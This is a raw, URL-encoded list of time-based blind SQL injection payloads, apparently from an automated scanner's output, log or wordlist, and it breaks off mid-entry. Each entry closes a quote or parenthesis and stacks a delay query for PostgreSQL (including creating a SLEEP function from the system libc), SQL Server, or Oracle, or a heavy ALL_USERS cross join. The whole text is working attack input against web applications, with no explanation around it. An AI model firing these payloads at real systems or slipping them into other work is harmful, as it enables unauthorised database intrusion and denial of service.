1%22%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%28%28%22jCuC%22%20LIKE%20%22jCuC 1%22%29%29%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%28%28%28%22Gaml%22%20LIKE%20%22Gaml 1%22%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20AND%20%22BANi%22%20LIKE%20%22BANi 1%29%20WHERE%208870%3D8870%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B-- 1%27%29%20WHERE%206616%3D6616%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B-- 1%27%20WHERE%203892%3D3892%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B-- 1%22%20WHERE%201896%3D1896%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B-- 1%27%20%7C%7C%20%28SELECT%208746%20FROM%20DUAL%20WHERE%208222%3D8222%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%207928%20WHERE%208044%3D8044%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%205035%20FROM%20DUAL%20WHERE%209688%3D9688%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20%29 1%20%2B%20%28SELECT%202570%20WHERE%202007%3D2007%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20%29 1%27%20%2B%20%28SELECT%20%27LZnK%27%20FROM%20DUAL%20WHERE%208461%3D8461%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27wbLQ%27%20WHERE%208909%3D8909%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%3B%20CREATE%20OR%20REPLACE%20FUNCTION%20SLEEP%28int%29%20RETURNS%20int%20AS%20%27%2Flib%2Flibc.so.6%27%2C%27sleep%27%20language%20%27C%27%20STRICT%3B%20SELECT%20sleep%285%29%3B--%20%23 1%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B-- 1%27%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B-- 1%27%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B-- 1%22%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B-- 1%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%285334%3D5334 1%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%28%285880%3D5880 1%29%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%28%28%286229%3D6229 1%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B-- 1%27%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%28%27TssF%27%3D%27TssF 1%27%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%28%28%27Awbz%27%3D%27Awbz 1%27%29%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%28%28%28%27wTZs%27%3D%27wTZs 1%27%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%27bFKy%27%3D%27bFKy 1%27%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%28%27oQcB%27%20LIKE%20%27oQcB 1%27%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%28%28%27hMtU%27%20LIKE%20%27hMtU 1%27%29%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%28%28%28%27CoNa%27%20LIKE%20%27CoNa 1%27%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%27duxC%27%20LIKE%20%27duxC 1%22%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%28%22nftm%22%3D%22nftm 1%22%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%28%28%22JEMl%22%3D%22JEMl 1%22%29%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%28%28%28%22GWAm%22%3D%22GWAm 1%22%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%22BAeX%22%3D%22BAeX 1%22%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%28%22WEcg%22%20LIKE%20%22WEcg 1%22%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%28%28%22tfYr%22%20LIKE%20%22tfYr 1%22%29%29%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%28%28%28%22PWfc%22%20LIKE%20%22PWfc 1%22%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20AND%20%22nSJE%22%20LIKE%20%22nSJE 1%29%20WHERE%205189%3D5189%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B-- 1%27%29%20WHERE%202616%3D2616%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B-- 1%27%20WHERE%203871%3D3871%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B-- 1%22%20WHERE%206370%3D6370%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B-- 1%27%20%7C%7C%20%28SELECT%206890%20FROM%20DUAL%20WHERE%207809%3D7809%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%207550%20WHERE%208324%3D8324%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%206581%20FROM%20DUAL%20WHERE%207407%3D7407%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20%29 1%20%2B%20%28SELECT%204406%20WHERE%208307%3D8307%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20%29 1%27%20%2B%20%28SELECT%20%27cMpE%27%20FROM%20DUAL%20WHERE%204839%3D4839%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27bloL%27%20WHERE%205201%3D5201%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3B--%20%23 1%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2879%29%7C%7CCHR%28118%29%7C%7CCHR%2885%29%7C%7CCHR%2873%29%2C5%29%20FROM%20DUAL%3B-- 1%27%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2879%29%7C%7CCHR%28118%29%7C%7CCHR%2885%29%7C%7CCHR%2873%29%2C5%29%20FROM%20DUAL%3B-- 1%27%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2879%29%7C%7CCHR%28118%29%7C%7CCHR%2885%29%7C%7CCHR%2873%29%2C5%29%20FROM%20DUAL%3B-- 1%22%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2879%29%7C%7CCHR%28118%29%7C%7CCHR%2885%29%7C%7CCHR%2873%29%2C5%29%20FROM%20DUAL%3B-- 1%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2879%29%7C%7CCHR%28118%29%7C%7CCHR%2885%29%7C%7CCHR%2873%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%283150%3D3150 1%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2879%29%7C%7CCHR%28118%29%7C%7CCHR%2885%29%7C%7CCHR%2873%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%28%287635%3D7635 1%29%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2879%29%7C%7CCHR%28118%29%7C%7CCHR%2885%29%7C%7CCHR%2873%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%28%28%285904%3D5904 1%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2879%29%7C%7CCHR%28118%29%7C%7CCHR%2885%29%7C%7CCHR%2873%29%2C5%29%20FROM%20DUAL%3B-- 1%27%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2879%29%7C%7CCHR%28118%29%7C%7CCHR%2885%29%7C%7CCHR%2873%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%28%27NlUN%27%3D%27NlUN 1%27%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2879%29%7C%7CCHR%28118%29%7C%7CCHR%2885%29%7C%7CCHR%2873%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%28%28%27lJES%27%3D%27lJES 1%27%29%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2879%29%7C%7CCHR%28118%29%7C%7CCHR%2885%29%7C%7CCHR%2873%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%28%28%28%27HFMY%27%3D%27HFMY 1%27%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2879%29%7C%7CCHR%28118%29%7C%7CCHR%2885%29%7C%7CCHR%2873%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%27mvAJ%27%3D%27mvAJ 1%27%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2879%29%7C%7CCHR%28118%29%7C%7CCHR%2885%29%7C%7CCHR%2873%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%28%27ZEIp%27%20LIKE%20%27ZEIp 1%27%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2879%29%7C%7CCHR%28118%29%7C%7CCHR%2885%29%7C%7CCHR%2873%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%28%28%27lesL%27%20LIKE%20%27lesL 1%27%29%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2879%29%7C%7CCHR%28118%29%7C%7CCHR%2885%29%7C%7CCHR%2873%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%28%28%28%27IPoC%27%20LIKE%20%27IPoC 1%27%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2879%29%7C%7CCHR%28118%29%7C%7CCHR%2885%29%7C%7CCHR%2873%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%27OAxL%27%20LIKE%20%27OAxL 1%22%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2879%29%7C%7CCHR%28118%29%7C%7CCHR%2885%29%7C%7CCHR%2873%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%28%22Sapv%22%3D%22Sapv 1%22%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2879%29%7C%7CCHR%28118%29%7C%7CCHR%2885%29%7C%7CCHR%2873%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%28%28%22PgxE%22%3D%22PgxE 1%22%29%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2879%29%7C%7CCHR%28118%29%7C%7CCHR%2885%29%7C%7CCHR%2873%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%28%28%28%22jGay%22%3D%22jGay 1%22%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2879%29%7C%7CCHR%28118%29%7C%7CCHR%2885%29%7C%7CCHR%2873%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%22wqqJ%22%3D%22wqqJ 1%22%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2879%29%7C%7CCHR%28118%29%7C%7CCHR%2885%29%7C%7CCHR%2873%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%28%22sgFS%22%20LIKE%20%22sgFS 1%22%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2879%29%7C%7CCHR%28118%29%7C%7CCHR%2885%29%7C%7CCHR%2873%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%28%28%22SBUt%22%20LIKE%20%22SBUt 1%22%29%29%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2879%29%7C%7CCHR%28118%29%7C%7CCHR%2885%29%7C%7CCHR%2873%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%28%28%28%22SmRA%22%20LIKE%20%22SmRA 1%22%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2879%29%7C%7CCHR%28118%29%7C%7CCHR%2885%29%7C%7CCHR%2873%29%2C5%29%20FROM%20DUAL%3B--%20AND%20%22QWTe%22%20LIKE%20%22QWTe 1%29%20WHERE%208349%3D8349%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2879%29%7C%7CCHR%28118%29%7C%7CCHR%2885%29%7C%7CCHR%2873%29%2C5%29%20FROM%20DUAL%3B-- 1%27%29%20WHERE%209573%3D9573%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2879%29%7C%7CCHR%28118%29%7C%7CCHR%2885%29%7C%7CCHR%2873%29%2C5%29%20FROM%20DUAL%3B-- 1%27%20WHERE%208353%3D8353%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2879%29%7C%7CCHR%28118%29%7C%7CCHR%2885%29%7C%7CCHR%2873%29%2C5%29%20FROM%20DUAL%3B-- 1%22%20WHERE%206799%3D6799%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2879%29%7C%7CCHR%28118%29%7C%7CCHR%2885%29%7C%7CCHR%2873%29%2C5%29%20FROM%20DUAL%3B-- 1%27%20%7C%7C%20%28SELECT%202271%20FROM%20DUAL%20WHERE%209633%3D9633%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2879%29%7C%7CCHR%28118%29%7C%7CCHR%2885%29%7C%7CCHR%2873%29%2C5%29%20FROM%20DUAL%3B--%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%204566%20WHERE%202765%3D2765%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2879%29%7C%7CCHR%28118%29%7C%7CCHR%2885%29%7C%7CCHR%2873%29%2C5%29%20FROM%20DUAL%3B--%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%203599%20FROM%20DUAL%20WHERE%205480%3D5480%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2879%29%7C%7CCHR%28118%29%7C%7CCHR%2885%29%7C%7CCHR%2873%29%2C5%29%20FROM%20DUAL%3B--%20%29 1%20%2B%20%28SELECT%209801%20WHERE%203167%3D3167%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2879%29%7C%7CCHR%28118%29%7C%7CCHR%2885%29%7C%7CCHR%2873%29%2C5%29%20FROM%20DUAL%3B--%20%29 1%27%20%2B%20%28SELECT%20%27iyxO%27%20FROM%20DUAL%20WHERE%202276%3D2276%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2879%29%7C%7CCHR%28118%29%7C%7CCHR%2885%29%7C%7CCHR%2873%29%2C5%29%20FROM%20DUAL%3B--%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27qMmZ%27%20WHERE%209256%3D9256%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2879%29%7C%7CCHR%28118%29%7C%7CCHR%2885%29%7C%7CCHR%2873%29%2C5%29%20FROM%20DUAL%3B--%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%3B%20SELECT%20DBMS_PIPE.RECEIVE_MESSAGE%28CHR%2879%29%7C%7CCHR%28118%29%7C%7CCHR%2885%29%7C%7CCHR%2873%29%2C5%29%20FROM%20DUAL%3B--%20%23 1%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B-- 1%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B-- 1%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B-- 1%22%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B-- 1%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%289133%3D9133 1%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%28%282489%3D2489 1%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%28%28%288399%3D8399 1%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B-- 1%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%28%27Mabl%27%3D%27Mabl 1%27%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%28%28%27XcXd%27%3D%27XcXd 1%27%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%28%28%28%27AdmI%27%3D%27AdmI 1%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%27Unnd%27%3D%27Unnd 1%27%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%28%27iytt%27%20LIKE%20%27iytt 1%27%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%28%28%27oFIy%27%20LIKE%20%27oFIy 1%27%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%28%28%28%27ltkm%27%20LIKE%20%27ltkm 1%27%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%27ETaZ%27%20LIKE%20%27ETaZ 1%22%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%28%22LLFj%22%3D%22LLFj 1%22%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%28%28%22DrKt%22%3D%22DrKt 1%22%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%28%28%28%22FAmg%22%3D%22FAmg 1%22%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%22rXqa%22%3D%22rXqa 1%22%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%28%22pvbv%22%20LIKE%20%22pvbv 1%22%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%28%28%22TAej%22%20LIKE%20%22TAej 1%22%29%29%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%28%28%28%22xXiB%22%20LIKE%20%22xXiB 1%22%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20AND%20%22uqZq%22%20LIKE%20%22uqZq 1%29%20WHERE%208198%3D8198%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B-- 1%27%29%20WHERE%209676%3D9676%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B-- 1%27%20WHERE%204544%3D4544%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B-- 1%22%20WHERE%209306%3D9306%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B-- 1%27%20%7C%7C%20%28SELECT%207479%20FROM%20DUAL%20WHERE%201276%3D1276%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20%29%20%7C%7C%20%27 1%27%20%7C%7C%20%28SELECT%208555%20WHERE%209476%3D9476%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20%29%20%7C%7C%20%27 1%20%2B%20%28SELECT%208757%20FROM%20DUAL%20WHERE%204366%3D4366%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20%29 1%20%2B%20%28SELECT%202520%20WHERE%207035%3D7035%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20%29 1%27%20%2B%20%28SELECT%20%27xfTY%27%20FROM%20DUAL%20WHERE%206843%3D6843%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27PCTf%27%20WHERE%205562%3D5562%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%3B%20SELECT%20COUNT%28%2A%29%20FROM%20ALL_USERS%20T1%2CALL_USERS%20T2%2CALL_USERS%20T3%2CALL_USERS%20T4%2CALL_USERS%20T5%3B--%20%23 1%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B-- 1%27%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B-- 1%27%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B-- 1%22%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B-- 1%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%285431%3D5431 1%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%281969%3D1969 1%29%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%28%289100%3D9100 1%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B-- 1%27%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%27eDxy%27%3D%27eDxy 1%27%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%28%27KFaj%27%3D%27KFaj 1%27%29%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%28%28%27aOSM%27%3D%27aOSM 1%27%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%27BgfZ%27%3D%27BgfZ 1%27%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%27DBMa%27%20LIKE%20%27DBMa 1%27%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%28%27xJHm%27%20LIKE%20%27xJHm 1%27%29%29%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%28%28%27gSVF%27%20LIKE%20%27gSVF 1%27%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%27TIcQ%27%20LIKE%20%27TIcQ 1%22%29%3B%20BEGIN%20DBMS_LOCK.SLEEP%285%29%3B%20END%3B--%20AND%20%28%22ihQD%22%3D%22ihQD 